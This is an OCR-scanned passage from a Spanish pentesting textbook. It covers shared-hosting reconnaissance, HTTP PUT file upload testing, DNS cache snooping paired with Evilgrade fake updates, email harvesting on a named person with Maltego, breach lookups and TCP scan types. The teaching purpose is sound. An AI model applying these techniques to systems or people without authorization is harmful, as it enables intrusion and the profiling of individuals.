la  semiridad  en  un  shared  hosting  sera  la  equivalenle  al  sitio  inenos  preparado  en  este  ambito  que 
compaite  cl  host. 

^.Que  cosas  se  pueden  buscar?  Realmente  el  saber  que  sitios  estan  almaccnados  en  el  mismo  host 
es  iinpoitantc  y  se  podria  buscar  tallos  sobre  los  otros  siiios  para  encontiar  la  via  de  accedei  al 
que  intcresa.  Pero  esto  tiene  un  probleina.  y  es  que  en  una  auditoria  real  el  auditor  no  se  puede 
aprovechar  de  un  fallo  en  olro  dominio,  es  decir,  no  perteneciente  al  cliente  ya  que  puede  suponer 
un  probleina  legal. 

El  atacante  por  el  contrario  si  puede  encontrar  esta  via  como  un  punto  de  acceso  al  sitio  que  le 
interesa.  Por  esta  razon,  si  lo  que  se  expone  en  este  sitio  es  iinportantc  para  la  empresa,  en  la  auditoria 
se  marca  como  una  recoinendacion  de  seguridad  no  \x\\\\z'dx  shared  hosting. 
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En  el  ejemplo  de  esta  prueba  de  concepto  se  utilizara  el  motor  de  busqueda  Bing  para  saber  que  sitios 
o  dominios  se  encuentran  alojados  en  la  misma  direccion  IP.  Para  ello  se  utiliza  el  operador  ZP  en  el 
campo  de  busqueda,  tal  y  como  se  puede  visualizar  en  la  siguiente  imagen. 


Vi/EB  ir.lAGEMES  VIDEOS  flQTlCIAS  MAPAS  HI STORIAL  DE  BUSQUEDA 


bing 


ip:216.239  38.21 


P 


27D.000  RESULTADOS  Filtrar  por  idioma  Filtrar  par  region 

Cabana  del  Retire 
cabanadelretiro  com 

Esta  pagina  esta  siendo  actualizada.  disculpHgn  las  molestias  Pueden  contactar  con  el 
Aula  ambiental  La  Cabana  del  Retiro  a  traves  de 

Onda  Tenerife 

nneatenenfe-cerr 

A  cargo  y  cuenta  de  las  tra’vesuras  del  quiquere  del  Eliseo  lel  sorprendente  donjuan 
Francois  Hollandei.  los  franceses  por  ejemplo  estan  -durante  estos  dias 

Latinoamerica  Viajes 

■  ■  |-*  nna^'erica’iajes  cor 

especialistas  en  buscarte  el  precio  mAs  econOmico  y  \b  mejor  conexiOn 
Actividades  amblentales  en  el  Retiro 

.V  .V.  acti.idadesamcieniaifesreii'i-^om 

jjBienvenidaS'OS  al  clog  del  Centro  de  Informacion  yEducacion  Ambiental  de  El  Huerto 
del  Retiroll  Con  este  blog  el  Dec-artamento  de  Educacidn  Ambiental  del 

Alicia  G 

."..v,  aiir.iag  es  ~ 

El  proximo  sabadc  21  de  diciembre  ncs  juntarcs  en  "petit  conVite'  para  intimar  respecto 
3  y  sobre  la  piel  la  came,  la  poesia  Se  trata  de  jugar  a  descubnr 


Fig.  2.01 :  Busqueda  de  shared  hosting  con  Bing. 


Un  atacante  que  quiere  acceder  al  contenido  de  algiin  sitio  en  concrete  que  esta  detras  de  dicha 
direccion  IP  dispone  de  cientos  de  siiios  web  a  los  que  buscar  vulnerabilidades.  Antes  de  mostrar 
algunas  acciones  que  se  pueden  realizar  para  aprovecharse  de  una  vulnerabilidad  en  un  hosting 
coinpaitido,  se  va  a  mostrar  un  ejemplo  con  el  servicio  Rohtex. 

Con  este  sciwicio  se  puede  saber,  entre  otras  cosas,  cl  numero  aproximado  de  sitios  que  estan 
detras  de  una  direccion  IP.  En  algunas  ocasiones  puede  ser  realmente  util  iitilizar  este  servicio  para 
complementarsc  con  el  proporcionado  por  Bing. 

176  28  122-218  go  |  '“Tweei  :  Share  --  2c-guit 

Information 

the  IP  number  176.28  122  218  There  are  four  host  names  that  point  to  the  IP  number  176  23. 122.213  all  of  those  point  only  to  that  ip  numbe.'' 
two  of  them  use  the  two  name  servers  dns15  and  dns16  ser 


Fig.  2.02:  Obicncion  del  numero  de  sitios  detras  de  una  direccion  tP. 


46 


Ethical  Hacking:  Teoria  y  practica  para  la  realizacidn  de  iin  penlesting 


Ahora.  se  piiede  evaluar,  entre  olras  muchas  cosas,  los  metodos  que  admite  el  servidor  por  cadapath 
del  dominio  a  auditar.  Se  tiene  en  cuenta  que  un  atacante  podria  utilizar  al  resto  de  sitios  web  que  hay 
en  el  servidor,  pero  el  auditor  solo  debe  utilizar  del  que  tiene  permiso.  Esta  claro  que  es  un  punto  de 
desventaja.  pero  la  etica  es  la  que  marca  el  proceso. 

Para  obtener  un  listado  de  los  metodos  HTTP  que  el  sitio  permite  se  puede  utilizar  una  herramienta 
denominada  RestClienl-Tool.  La  herramienta  proporciona  un  listado  con  los  metodos  HTTP  que 
se  pueden  ejecutar  y  dispone  de  una  zona  donde  se  muestran  los  resultados  de  la  operacion.  En  la 
imagen  se  puede  visualizar  como  se  obtiene  un  listado  de  metodos  HTTP  habilitados,  pero  esto  no 
quiere  decir  que  al  realizar  la  accion  se  lleve  a  cabo  con  exito. 


Por  ejemplo,  si  el  servidor  responde  que  el  metodo  PUT  esta  habilitado,  se  debera  probar  este 
hecho,  ya  que  se  podria  subir  un  archivo  al  servidor,  por  ejemplo  una  wehshell.  Aunque  por  otro 
lado,  aunque  no  se  mostrara  el  metodo  PUT  como  habilitado  se  deberia  probar,  ya  que  en  algiinas 
ocasiones  no  se  lisla  el  metodo,  pero  se  encuentra  implementado,  es  decir,  si  se  invoca  se  ejecuta. 


@  RestClient-Tool 
http 

Headers 


OPTIONS  /  HXTP/1.1 
Hast : 

Conneccion: 
Keep-Alive 
Uaer-Agenc : 
ReatClient-Tool 


Params 


Body  D  Use  body  text  |  File  [ 


^  a 


=>  II  B  uad 

OPTIONS  - 


HTTP/ 1.1  200  OK 
DAV:  1,  2 
DASL:  <DAV;sql> 
MS-Authcr-Via:  DAV 


Con-cent-Length:  0 
Allowr  OPTIONS, 

TAACi,  GZT,  HZAZ-, 
DZLSTZ,  COPY,  MOVE, 
PAOPFIND,  PAOPPAICH, 
SEAACH,  MKCOL,  LOOK, 
TJWLOCK 

A-ccapt-Aangea:  none 
X-Powered-By :  ASP -Mil 
SerA’er  : 

Micrcacf t-IIS/ 5 . 0 
Cache-Control : 
private 

Piiblic:  OPTIONS, 
TAACZ,  GET,  HEAD, 
DEI^TE,  PUT,  POST, 
COPY,  MOl^,  21KCOIL, 
PAOPFIND,  PAOPPATCH, 
LOCK,  UlU-OCK,  SEAACH 


Fig.  2.03;  Obtencion  de  metodos  HTTP  habilitados. 


Cambiando  el  metodo  HTTP  en  ReslClieni  se  puede  comprobar  el  comporlamicnto  del  servidor  ante 
el  uso  de  metodos  HTTP  peligrosos  como  PUT,  DELETE,  COPY  o  MOVE.  En  la  imagen  se  puede 
visualizar  como  la  cjecucion  del  metodo  PUT  sorprende  con  un  exito  en  la  subida  del  aichivo,  y 
esto  puede  provocar  que  una  wehshell  tome  el  control  del  servidor  remoto.  Esto  puede  ocurrir  en 
cualquier  tipo  de  servidor,  por  lo  que  no  hace  falta  que  lengan  sitios  comparlidos.  pero  el  peligro  es 
mayor  en  general  en  temas  de  seguridad  cuantos  mas  sitios  hay  en  un  servidor. 
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http:Al 

Headers 


Body  [Zl  Use  body  text 

Prueba  realizada  por 
infQrs;atica64| 


PUT  .>'inforBiatica€4-Ceat 
HTTP/1-1 

Content-Length:  34 
Content-Tipe :  text/plain; 
charaet=DTF-3 
Hoat: 

Connection:  Keep-Alive 
User-Agent:  ReatClient-Tool 


Prueba  realizada  por 
infQrmatica€4 


J 


iiTTP/l.l  200  OK 


GMT 

Content-Length:  0 
Allov:  OPTICHS,  TAACE.  GET, 
HEAD,  DELETE,  PUT,  COPT,  MOl^ 
PAOPFIirD,  PAOPPATCH,  SEARCH, 
LOCK,  UNLOCK 
X-Powered-By:  ASP .NET 
Server:  Micrcscft-IIS/S.O 


Fig.  2.04:  Subida  de  archivo  a  iraves  do  PUT  implementado. 


PoC:  DNS  Cache  Snooping  y  Evilgrade 

1:11  esta  prueba  de  concepto  se  presenta  el  concepto  de  DNS  Cache  Snooping  con  el  que  un  atacante 
puede  conocer  los  sitios  por  los  que  una  organizacion  puede  navegar.  En  otras  palabras.  gracias  a 
csla  vulnerabilidad  un  atacante  puede  conocer  los  liabitos  de  los  empleados  de  una  organizacion  y 
preparar  ataques  basandose  en  esta  circunstancia.  Por  ejemplo,  se  puede  utilizar  esta  informacion 
para  preparar  un  phishing  para  los  empleados  de  la  organizacion,  realizar  un  envio  masivo  de 
correos  electronicos  con  los  que  presentar  el  phishing  o  conocer  las  direcciones  de  actualizacion  dc 
aplicaciones  que  se  utilizan  inteniamente  en  la  organizacion. 

En  la  siguiente  imagen  se  puede  visualizar  un  ejemplo  de  comprobacion,  a  traves  de  la  heiTamienta 
DNSrecon^  si  un  sei'vidor  DNS  tiene  cacheado  un  listado  de  dominios  coiicretos. 


root(g)kalico: 


Archivo  Editar  Ver  Buscar  Terminal  Ayuda  . 


1'  '  :-#  dns recon. py  -t  snoop  -n  c 

Performing  Cache  Snooping  against  NS 


Server: 


Name:  www.google.com.  TTL:  43 
Name:  www.google.com.  TTL:  43 
Name:  www.googTe.com.  TTL:  43 
Name:  www.googTe.com.  TTL:  43 
Name:  www.googTe.com.  TTL:  43 
Name:  www.ingdirGct.es.  TTL: 
:-#  I 


Address : 
Address : 
Address : 
Address : 
Address : 


167543  Address:  IS 


®s  -D  Desktop/dominios 
213.144.49.35 

42  Type: 

Type: 

Typ€ 

Type: 

Type: 

2 


43 

44 

40 

41 


A 

A 

A 

A 

A 

Type 


Fig.  2.05:  De.scubrimieuto  de  DNS  Cache  Snooping. 


En  el  ejemplo  se  uliliza  el  dominio  de  actualizacion  de  la  herramienta  Notepad-^^.  Sabiendo  que 
la  organizacion  la  ntiliza  se  puede  presentar  un  ataque  con  Evilgrade  framework  para  atacar  las 
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maquinas  que  lo  utilicen.  Tambien  se  podnan  realizar  tecnicas  de  DNS  Spoofing  en  la  organizacion 
para  conseguir  que  las  actualizaciones  no  fueran  legitimas,  y  si  las  que  presenta  el  framework 
comentado. 


En  la  imagen  se  puede  visual izar  con  Wireshark  a  donde  solicila  la  actualizacion  la  heiTamienta 
Notepad++.  La  hen-amienta  hace  la  solicitud  por  HTTP  sin  ninguna  proteccion,  por  lo  que  es 
sencillo  obtener  el  dominio.  En  este  punto,  y  gracias  a  la  infomiacion  obtenida,  se  podria  hacer  un 
listado  de  heiTamientas  vulnerables  a  Evilgrade  y  realizar  la  prueba  gracias  a  la  vulnerabilidad  DNS 
Cache  Snooping.  Toda  esta  operativa  quedaria  reflejada  en  el  infonne,  indicando  que  dominios  ban 
dado  positivo  en  la  prueba. 


-Stream  Content -  ^  ~  _ 

'  '.GET  7update/qGtDownl oadurl .  php?versi on=6.  22  http/1. 1 
Host:  notepaa-plus-plus.org 
i  Accept : 

HTTP /I. 1  200  OK 

Date:  Thu,  27  Mar  2014  19:41:08  GMT 
Server :  Apache 

X-Powered-By:  PHP/5.  3.  3-7-i-squeezel9 
vary:  Accept-Encoding 
Transfer -Encoding:  chunked 
Content -Type :  text/html 

372 
<!  — 

This  file  is  part  of  GUP. 

GUP  is  free  softv/are:  you  can  redistribute  it  and/or  modify  u  ^  u 

it  under  the  terms  of  the  GNU  Lesser  General  Public  License  as  published  by 
the  Free  softv/are  Foundation,  either  version  3  of  the  License,  or 
(at  your  option)  any  later  version.] 

GUP  is  distributed  in  the  hope  that  it  v/ill  be  useful, 
but  WITHOUT  ANY  WARRANTY;  without  even  the  implied  warranty  of 
MERCHANTABILITY  or  FITNESS  FOR  A  PARTICULAR  PURPOSE.  See  the 
GNU  Lesser  General  Public  License  for  more  details. 

YOU  should  have  received  a  copy  of  the  GNU  Lesser  General  Public  License 
along  v/ith  GUP.  If  not,  see  <nttp : //va-a*/.  gnu.  or g/1  i censes />. 

— > 


<?xml  version=‘'l.  0‘'?> 

<GUP> 

. <NeedToBeUpdated>yes</NeedToBeupdated> 

.  <version>6. 5. 5</version>  ,  ^  . 

.<Location>http://download.tuxfamily, org/notepadpl us/6. 5. 5/npp. 6. 5. 5. Instal ler. exe</ 
Location> 

</GUP> 

0 _ 

Fig.  2.06:  Rcspuesta  medianlc  HTTP  vulnerable. 


t.Que  es  el  Evilgrade  frameworkl  Es  un  conjunto  de  heiTamientas  que  permiten  comprometer  equipos 
a  traves  de  actualizaciones  falsas.  E\  framework  necesita  que  antes  el  atacante  haya  realizado  ARP 
Spoofing.  DNS  Spoofing,  configuracion  de  un  punto  de  acceso  wireless  falso,  secuestro  de  DHCP 
0  cualquier  otra  nianera  que  permita  al  atacante  interceptar  el  trafico  de  la  victiina.  Es  posible 
conseguir  el  control  total  de  una  maquina  objetivo  que  se  encuentre  completamente  actualizada  en 
un  test  de  intrusion. 
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PoC:  El  correo 

En  esta  prueba  de  concepto  se  muestra  la  importancia  del  rastro  de  informacidn  que  los  usuarios 
dejan  en  Internet.  El  escenario  es  el  siguiente: 

-  ^Como  empezar?  Existen  multitud  de  scripts  con  los  que  se  puede  obtener  dirccciones  de 
correo  de  una  empresa  o  dominio  concreto.  El  objetivo  es  tener  un  hilo  por  donde  comenzar 
la  busqueda  masiva  de  con*eos  electronicos  de  una  organizacion.  Estos  coitcos  se  podran 
utilizar  para  diversas  cosas:  APTs.  nombres  de  usuarios  y  fuerza  bruta,  phishing,  ataques  de 
exploits  en  el  correo,  relacionar  infomiacion  y  contactos,  nombres  de  personas  o  emplcados, 
etcetera. 

-  Otra  via,  como  las  que  propone  la  hen*amienta  Maltego,  es  utilizar  el  nombre  de  una 
persona  en  concreto  y  recolectar  cuentas  de  comeo  electronico  que  pertenezcan  a  esta. 
Despues,  se  puede  relacionar  esta  infomiacion  con  los  sitios  web  donde  se  encontraron  y  ver 
por  que  se  encuentra  en  dichos  sitios. 

-  Una  vez  se  disponen  de  cuentas  de  correo  electronicos,  nombres  de  usuarios,  infomiacion 
sobre  las  personas  de  la  organizacion  se  puede  utilizar  servicios  como  haveibeenpwned.  el 
dial  proporciona  la  posibilidad  de  saber  si  uno  de  esos  con^eos  electronicos  ha  sido  dumpeado 
en  algunas  de  las  bases  de  datos  robadas  y  publicadas  en  Internet.  Es  un  servicio  niuy  curioso 
a  la  vez  que  interesante. 


En  primer  lugar  se  muestra  un  script  de  ejeniplo  para  llevar  a  cabo  la  primera  larea  de  la  antcrior 
lista.  El  nombre  del  script  es  googlepyfhonmail.py.  aunque  se  puede  encontrar  con  otros  nombres 
en  Internet.  La  ejecucion  es  sencilla,  por  ejemplo  en  una  distribucion  Kali  Linux,  se  debc  ejecuiar 
python  googlepythonmail.py  <domain-name> . 


:-#  python  googlepythonmail.py  llpaths.com 


Google  Web  &  Group  Results: 


j .  ; . ;  @llpaths.com 

5llpaths.com  _ 

ip@llpaths.com  ' 

@llpaths .com  /  j  i  !  ; 

(511paths.com  — 

j@llpaths  .com 

(511paths.com _ 

Fig.  2.07:  Fjempio  de  uso  dc  pyihongooglemail. 


La  herramienta  Maltego  proporciona  distintas  funcionalidades  en  la  etapa  footprinting,  pero  una 
que  llama  la  atencion  es  la  de  busqueda  a  traves  del  nombre  de  una  persona.  Esta  funcionalidad 
puede  resLiltar  interesante  en  funcion  del  tipo  de  prueba  que  el  auditor  se  encuentre. 
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Please  select  the  machine  to  run  from  the  list  below; 

O  Footprint  L3  [Divm^inl  E 

Th'C  p^rfornns  a  l?rv^l  5  'intarisci  footprint  oi".  a  dom'iin  It  taker  a  w,., 

I'j^'  Person  -  Email  Address  [Person)  _ 

Tries  to  obtain  someone’s  emaJ  address  and  sees  /.here  it’s  used  o.. 

O  Prune  Leaf  Entities  [1  ~ 

Machine  to  prune  leaf  entities. 

O  Twitter  Digger  [Phrase] 

VVorl:s  on  a  phrase  as  a  Twitter  alias  I  Jote  that  this  triadiine  'aiH  alnx. 

■i'^  TuiHtar  CSan  I  nrati/xn - - tc»L-.r->f.O — 

0  Show  on  startup 

0  Show  on  empty  graph  click _ _ 

Fig.  2.08:  Seleccion  de  Hincionalidad  person  -  email  address. 


Tras  seleccionar  la  funcionalidad  se  introduce  el  nombre  de  la  persona  de  la  que  se  quiere  recabar 
informacion  en  Internet.  Lo  primero  que  la  herramienta  va  a  devolver  es  un  numero  de  cuentas 
de  correo  eleclronico  con  las  que  se  realizara  un  primer  nivel  de  evaluacion  y  descubrimienlo  de 
informacion  sobrc  la  persona.  Tal  y  como  se  puede  visual izar  en  la  imagen  el  numero  de  cuentas 
de  correo  electronico  puede  ser  alto.  Logicamente  existe  la  posibilidad  de  que  la  cuenta  de  coireo 
no  pertenezca  a  la  persona  buscada,  pero  son  distintas  vias  que  hay  que  explorar  en  funcion  de  las 
necesidades  que  el  auditor  tenga. 


r 

pablo  gonzalez 

L" 


pabio.gonzaie2@1ipaths.com 


pg0nzaie2@gmail.com  pabiogon2aiez@gma1i.com  pabio.gonzale2@gma1i.com 

C"' 

pbgie2c@gmaii.com  4^  / 

juanpablo@comboagency.com  bba023@gmail.com  pabluchas@hotmajl.com 


Fig.  2.09:  Correos  electronicos  obtenidos  con  Maltego. 

Una  vez  que  la  herramienta  realiza  la  biisqueda  y  consigue  oblener  las  cuentas  de  correo  se  puede 
elegir  sobre  que  cuentas  obtener  mas  informacion.  Por  ejemplo,  en  que  silios  se  ha  encontrado  esa 
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cuenta  o  cual  es  el  contexto  del  email  en  el  sitio  web.  En  la  imagen  se  puede  visualizar  el  menu  de 
eleccion  de  cuenta  de  correo  electronico  para  obtener  mayor  detalle. 


Select  email  addresses 

^  Select  relevant  addresses  yon  wish  to  continue 
with 

il  ^  X 

The  following  results  were  returned 

Type 

E 

□  ■  •  <juanpablo@CQmboaQency.com 

■ 

□  pabluchas@hotmail.com 

0  -V  ■  pablo.gonzalez@llpaths.com 

□  pbglezc@gmail.com 

□  4bba023@gmail.com 

□  . pablo@resf.com 

□  .iwebmaster@jeanp.com 

□  ^fs@pablogonzalez,es 

□  ^  member@qbatemp.net 

0  Remove  unselected  entities  from  graph 

Next> 

u 

Fig.  2, 10:  Menu  de  elcccion  de  cuenia  de  correo  electronico. 


Una  vez  seleccionadas  las  cuentas  de  correo  electronicos  que  se  quieren  explorar,  se  ira  dibujando  el 
grafo  que  presenta  la  heiTamienta  para  ver  en  que  sitios  web  se  encontraron  dichas  cuentas. 

En  este  instante  es  importante  entender  que  es  lo  que  se  pretende  con  esto,  y  es  obtener  mas 
informacion  sobre  los  habitos  del  usuario,  ambitos  en  los  que  se  mueve,  por  que  su  cuenta  de  correo 
electronico  esta  en  un  sitio  web,  y  sobretodo  conocer  mas  sobre  el.  Toda  infonnacion  que  se  obtenga 
dc  el  .sera  valiosa  en  el  proceso  de  recoleccion  de  informacion  antes  o  despues. 
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Como  se  ha  mencionado  anteriormente  el  servicio  liaveibeenpwned  pennite,  dado  iin  con*eo 
electronico  de  un  usuario,  saber  si  una  cuenta  se  encuentra  expuesta  en  algun  clump  de  base  de  datos 
en  Internet. 

El  servicio  es  llamativo  a  los  ojos  de  los  usuarios,  pero  puede  ser  de  gran  ulilidad  en  un  penfesting. 
Ademas,  puede  ser  de  gran  utilidad  ya  que  se  podria  obtener  la  credencial  teniendo  acceso  a  la  base 
de  datos  donde  se  pudiera  encontrar  dicha  cuenta. 


En  la  sigiiiente  imagen  se  puede  visualizar  como  se  presenta  el  servicio.  Se  dispone  de  un  input 
donde  introducir  el  correo  electronico  para  verificar  si  este  se  encuentra  en  alguna  base  de  datos. 


Oh  no  —  pwned  on  1  site! 

Are  you  creating  strong,  unique  passwords  on  all  sites? 
B  Notify  me  if  my  address  gets  pwned  In  the  future 
H  Did  you  find  this  useful  and  want  to  donate? 


Fig.  2.12:  Servicio  licn-e  /  been  pwned. 


A  continuacion  se  nuiestra  dos  ejemplos  de  cuando  se  tiene  exito  y  se  encuentra  una  cuenta  en  el 
servicio  y  cuando  no.  Se  puede  visualizar  que  cuando  se  encuentra  una  cuenta  en  el  sendcio  se 
indica  en  cuanlas  bases  de  datos  se  encuentra,  y  donde  se  produjo  el  robo  de  dicha  base  de  datos. 

Por  otro  lado  si  el  servicio  indica  '"good  news'^  significa  que  la  cuenta  de  con'eo  electronico 
introdiicida  no  se  encuentra  en  ninguna  de  las  bases  de  datos  a  las  que  el  servicio  tiene  acceso. 


Adobe 

The  big  one.  In  October  2013, 153  million  accounts  were  breached  with  each  containing  an  internal  ID. 
username,  email,  encrypted  password  and  a  password  hint  In  plain  text.  The  password  cryptography  was 
poorly  done  and  many  were  quickly  resolved  back  to  plain  text.  The  unencrypted  hints  also  disclosed  much 
ll-;  about  the  passwords  adding  further  to  the  risk  that  hundreds  of  millions  of  Adobe  customers  already  fa^d. 


Fig.  2.13:  Correo  encontrado  en  el  servicio. 


Good  news  —  no  pwnage  found! 

B  Notify  me  If  my  address  gets  pwned  in  the  future 
O  Did  you  find  this  useful  and  want  to  donate? 

CO 


Fig.  2.14:  Correo  no  encontrado  en  el  servicio. 
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Fingerprinting 

En  el  proceso  de  fingerprinting  se  lleva  a  cabo  una  recoleccion  de  informacion  que  consiste  en 
interactuardirectamente  con  lossistemas  para  aprendermas  sobre  su  configuracion  y  comportamiento. 
Estas  tecnicas  llevaran  a  cabo  un  escaneo  de  puertos  para  el  estudio  de  los  posibles  puertos  abiertos 
que  se  encuentren  y  determinar  que  sei-vicios  se  estan  ejecutando,  ademas  de  la  version  del  producto 
que  se  encuentra  detras  del  puerto. 

En  los  sistemas,  cada  puerto  que  se  encuentra  abierto  da  una  via  de  explotacion  al  auditor,  por  lo 
que  esta  informacion  es  muy  valorada  en  esta  fase.  Hay  que  conocer  los  tipos  de  escaneos  que 
se  encuentran  disponibles  y  saber  configurar  las  herramientas  para  poder  obtener  el  maximo  de 
infonnacion  posible. 

Hay  que  tener  cuidado  con  los  IDS.  Intrusion  Detection  System,  y  firewalls  que  se  puedan  encontrar 
en  el  analisis  de  puertos. 

Hay  distintos  tipos  de  escaneos  con  diferenles  objetivos.  Desde  saber  que  puertos  se  encuentran 
abieitos  liasta  saber  si  hay  m  firewall  delante  del  objetivo  o  no.  Cada  dia  salen  nuevas  formas  de 
escanear  maquinas  que  aportan  nuevos  rcsultados  inleresantes,  como  por  ejempio  medianle  un  tipo 
de  escaneo  especial  nmap  es  capaz  de  saber  la  seguridad  de  los  ceitificados  que  proporciona  un 
servidor  web.  Es  altamente  recomendable  estar  al  di'a  en  e.stc  tipo  de  tecnicas  y  vcrtienles  para  poder 
poner  en  practica  estas  habilidades. 

h  continuacion  se  pueden  estudiar  distintos  e.scaneos  y  los  objetivos  de  estos,  recuerde  que 
herramientas  como  nmap  disponen  de  gran  versatilidad  y  posibilidad  de  configuracion. 


Half  Scan 

Este  tipo  de  escaneo  consiste  en  realizar  el  procedimiento  three-way  handshake  sin  concluir  por 
completo  para  no  crear  una  cone.xion.  En  otras  palabras.  el  emisor  envia  un  SW  para  iniciar 
conexion,  si  el  reeeptor  envia  un  SYN-ACK  significa  que  el  puerto  se  encuentra  abierto,  entonces  el 
emisor  envia  un  RST+ACK  para  finalizar  la  conexibn,  en  vez  de  un  .4CK  que  seria  lo  normal  para 
crear  la  conexion.  La  viabilidad  de  este  tipo  de  escaneo  es  alta,  con  gran  fiabilidad  en  su  ejecucion. 


ACK  Scan 

La  linalidad  de  este  escaneo  es  distinta.  no  es  determinar  si  un  puerto  se  encuentra  abierto  o  no.  si 
no  si  un  equipo  de  la  red  esciicha  las  peticiones  a  traves  de  im  firewall.  El  emisor  envia  un  paquete 
con  un  ACK  activo.  el  receptor  debe  responder  con  un  RST  este  el  puerto  abierto  o  no,  si  no  existe 
respucsta  es  que  hay  un  coitafucgos  en  medio  de  la  comunicacibn. 


Null  Scan 

Este  tipo  de  escaneo  tiene  una  caracteristica  curiosa  y  es  que  el  paquete  que  se  envia  no  contiene 
ningiin  bit  activo.  El  emisor  envia  este  tipo  de  paquetes  y  si  el  puerto  se  encuentra  abierto  no  se 
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recibira  nada,  si  por  el  contrario  el  puerto  se  encuentra  cerrado  se  envia  un  RST-^ACK.  Es  por  ello, 
que  se  puede  encontrar  en  otros  libros  que  este  tipo  de  escaneo  tiene  como  fin  averiguar  cuales  son 
los  puertos  TCP  ceirados. 


Xmas  Scan 

Este  tipo  de  escaneo  tiene  en  sus  paquetes  los  bits  de  control  activos.  Windows,  por  defecto,  no 
responde  a  este  tipo  de  paquetes,  pero  antiguamente  la  pila  TCP/IP^  respondia  con  un  paquete 
RST^ACK  cuando  el  puerto  se  encontraba  cerrado,  mientras  que  si  el  puerto  se  encontraba  abierto 
no  se  respondia. 


FIN  Scan 

Este  tipo  de  escaneo  consiste  en  la  creacion  de  un  paquete  TCP  con  el  bit  de  FIN  activo.  El  emisor 
envia  el  paquete  y  si  el  puerto  se  encuentra  abierto  no  se  obtendra  respuesta,  sin  embargo,  si  el 
puerto  se  encuentra  cerrado  se  recibira  un  RST+ACK.  El  objetivo  o  finalidad  de  este  tipo  de  escaneo 
es  identico  al  null  scan  yMnas  scan,  incluso  algunos  autorcs  los  agrupan  como  escaneos  de  deteccion 
de  puertos  cerrados  a  estos  tipos. 


Idle  Scan 

Este  escaneo  es  uno  de  los  mas  complejos  y  su  eficacia  depende  de  la  maquina  elegida  como 
zombie.  En  el  escenario  habra  al  menos  3  maquinas,  una  es  la  del  atacante,  otra  maquina  sera  la 
zombie  o  intermediaria  y  la  ultima  la  victima.  La  maquina  del  atacante  debe  chequear  que  el  zombie 
utilice  un  algoritmo  predecible  para  marcar  los  paquetes  IP.  Para  averiguar  este  detalle  el  emisor  o 
atacante  envia  varios  paquetes  con  SYNA-ACK  para  iniciar  una  conexion,  cl  objetivo  es  obtener  RST 
y  chequear  que  los  ID  de  las  respuestas  son  sucesivos  o  predecibles.  Tambien  se  debe  verificar  que 
la  maquina  zombie  no  este  teniendo  trafico,  ya  que  sino  el  proceso  seria  inviablc. 

Cuando  el  atacante  haya  encontrado  una  \wkL\\\\\\2i zombie  que  pueda  ser  utilizada,  el  atacante  enviara 
paquetes  5}W  a  la  maquina  victima  haciendo  IP  Spoofing.  Los  paquetes  enviados  desde  la  maquina 
atacante,  con  la  direccion  IP  de  la  maquina  zombie,  a  la  victima  son  en  realidad  un  scan  normal.  La 
diferencia  se  encuentra  en  que  las  respuestas  de  la  victima  iran  destinadas  a  la  maquina  zombie,  por 
la  suplantacion  de  IP  realizada  por  el  atacante. 

Cuando  la  victima  conteste  a  la  peticion  SYN,  devolvera  un  SYN+ACK  si  el  puerto  se  encuentra 
abierto  o  un  RSTaACK  si  el  puerto  se  encuentra  cerrado.  Cuando  la  maquina  zombie  reciba  un 
SYN-ACK  enviara  un  RST  a  la  maquina  victima.  Si  la  maquina  zombie  recibe  un  RST-^ACK,  se 
declarara  como  trafico  nulo  y  se  descartara. 

Tras  esperar  un  corto  periodo  de  tiempo  el  atacante  preguntara  por  el  ID  de  los  paquetes  de  la 
maquina  y  pueden  ocurrir  2  situaciones  concretas,  en  primer  lugar  el  ID  se  ha  incrementado 

en  uno,  entonces  el  puerto  en  la  maquina  victima  esta  abierto,  o  por  el  contrario  si  el  ID  no  se  ha 
incrementado,  el  puerto  se  encuentra  cerrado. 
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Nniap 

Nmap  puede  suponer,  a  primera  vista,  una  herramienta  costosa  de  utilizar  por  su  flexibilidad  y 
diversidad  en  las  posibles  acciones  a  realizar  con  ella.  Tambien,  se  puede  recomendar  el  uso  de 
interfaces  graficas  para  la  utilizacion  de  nmap,  y  de  este  modo  simplificar  el  entendimiento  y  uso  de 
la  herramienta. 

La  ejecucion  de  los  comandos  nmap  se  puede  generalizar  mediante  el  siguiente  esquema  namp  <tipo 
de  .scan>  <opciones>.  La  ejecucion  por  defecto  seria  la  siguiente  nmap  <direccidn  IP>,  con  la  que 
se  obtiene  un  reporte  de  la  maquina  con  dicha  direccion  ZP  donde  se  informa  de  los  puertos  abiertos, 
servicios  encontrados  o  el  estado  de  la  maquina.  Para  ser  el  escaneo  por  defecto  no  es  poca  la 
informacion  obtenida.  Mas  adelante  se  puede  visualizar  ejemplos  practices  de  Nmap  en  auditorias. 


Fingerprint  Web 

Conocer  el  tipo  y  la  version  del  servidor  web  permite  detemfinar  vulnerabilidades  conocidas  y 
exploits  necesarios  para  aprovecharse  de  dichas  vulnerabilidades.  La  identificacion  de  los  servicios 
web  y  los  CMS  (Content  Managemente  System)  son  acciones  impoitantes. 

Ademas,  conocer  los  plugins  que  estos  pueden  utilizar  tambien  es  un  hecho  crucial  en  el  comienzo 
de  un  penlest  web.  Resumiendo,  un  /?/7g(?/7?/>7//77g  web  consta  de: 

-  Identificacion  del  servidor  web. 

-  Identificacion  de  los  CMS. 

Identificacion  de  plugins  de  los  CMS  y  vulnerabilidades. 

La  identificacion  del  servidor  web  sc  podria  llevar  a  cabo  con  herramientas  concretas  para  dicha 
accion  o  el  analisis  del  banner  del  servicio.  Una  herramienta  que  realiza  esta  accion  entre  otras 
inuchas  es,  la  mencionada  anteriomiente,  nmap.  Otra  herramienta  para  realizar  esta  labor  es 
whatweb.  tambien  conocida  como  la  heiTamienta  que  responde  a  ^\Que  es  este  .sitio  web? 

La  identificacion  de  CMS  ha  cobrado  gran  importancia  en  las  auditorias  actuales,  ya  que  cada  vez 
es  mas  recuiTido  el  uso  de  este  tipo  do  frameworks,  tambien  denominados  gestores  de  contenido.  En 
este  caso  tambien  se  puede  utilizar  la  herramienta  whatweb  para  realizar  esta  identificacion.  ^‘,C6mo 
llcva  a  cabo  su  tarea?  La  hen*ainienta  reconoce  analisis  estadistico  de  paquetes,  librerias 
servidores  web,  etcetera.  La  sintaxis  para  ejecutar  la  herramienta  es  whatweb  -v  <sitio  web>. 

La  identificacion  de  plugins  y  ciertas  vulnerabilidades  pueden  llevarse  a  cabo  con  multitud  de 
herramientas,  por  ejemplo  la  distribucion  de  seguridad  Kali  Linux  dispone  de  gran  cantidad  dc  cllas. 
Los  plugins  suelcn  ser  fuenie  de  gran  cantidad  de  vulnerabilidades,  las  cuales  pueden  ser  utilizadas 
